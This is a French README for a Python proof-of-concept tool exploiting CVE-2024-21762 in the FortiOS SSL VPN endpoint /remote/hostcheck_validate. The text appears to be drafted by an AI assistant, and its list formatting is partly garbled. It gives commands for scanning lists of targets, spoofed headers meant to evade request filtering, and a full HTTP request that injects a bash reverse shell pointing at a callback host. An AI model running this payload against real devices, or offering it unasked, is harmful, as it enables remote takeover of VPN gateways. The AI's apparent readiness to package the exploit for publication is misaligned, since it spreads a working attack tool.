
Scanner de preuve de concept ciblant CVE-2024-21762 dans le point de terminaison /remote/hostcheck_validate du VPN SSL FortiOS avec livraison de payload de shell inversé.
Scanner de preuve de concept ciblant CVE-2024-21762 dans le point de terminaison /remote/hostcheck_validate du VPN SSL FortiOS avec livraison de reverse shell.
Voici une fiche technique de style GitHub pour votre projet, incluant un résumé clair et concis, un guide d'utilisation et le contexte de sa pertinence avec la CVE.
CVE-2024-21762 FortiOS HostCheck PoC ScannerScanner de preuve de concept ciblant CVE-2024-21762 dans le point de terminaison
/remote/hostcheck_validatedu VPN SSL FortiOS avec livraison de reverse shell.
Ce script Python est un outil de preuve de concept (PoC) conçu pour interagir avec l'interface VPN SSL FortiOS de Fortinet, ciblant CVE-2024-21762 — un débordement de tampon basé sur la pile ou une injection de commande dans le point de terminaison /remote/hostcheck_validate.
Avertissement : Ceci est destiné uniquement à des fins éducatives et de tests autorisés.
/remote/hostcheck_validate sur une interface VPN SSL FortiGate.host).User-Agent, Cookie) pour contourner le filtrage superficiel des requêtes de FortiOS.last_response.txt)tqdm pour la visualisation de la progressionInstaller les dépendances :
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip VOTRE_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip VOTRE_IP --callback-port 8080
targets.txt : Liste des cibles au format IP:PORT, une par ligneresults.txt : Journal de sortie des tentatives d'exploitationPOST /remote/hostcheck_validate HTTP/1.1
Host: [cible]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[ip-de-rappel]/[port-de-rappel] 0>&1'&...
L'outil écrit la réponse HTTP complète de chaque tentative dans :
last_response.txt
Utilisez ce fichier pour vérifier si la requête a été analysée, rejetée, ou si un code d'erreur a été renvoyé.
Ce code est fourni uniquement à des fins éducatives et de tests autorisés. Ne l'utilisez pas sur des réseaux ou systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.
Carter — Ingénieur en cybersécurité, passionné d'équipes Rouge/Violet, amateur d'automatisation de PoC.
Souhaitez-vous que ceci soit empaqueté dans un fichier README.md + une structure de dépôt prête à être poussée sur GitHub ? Je peux générer cela ensuite.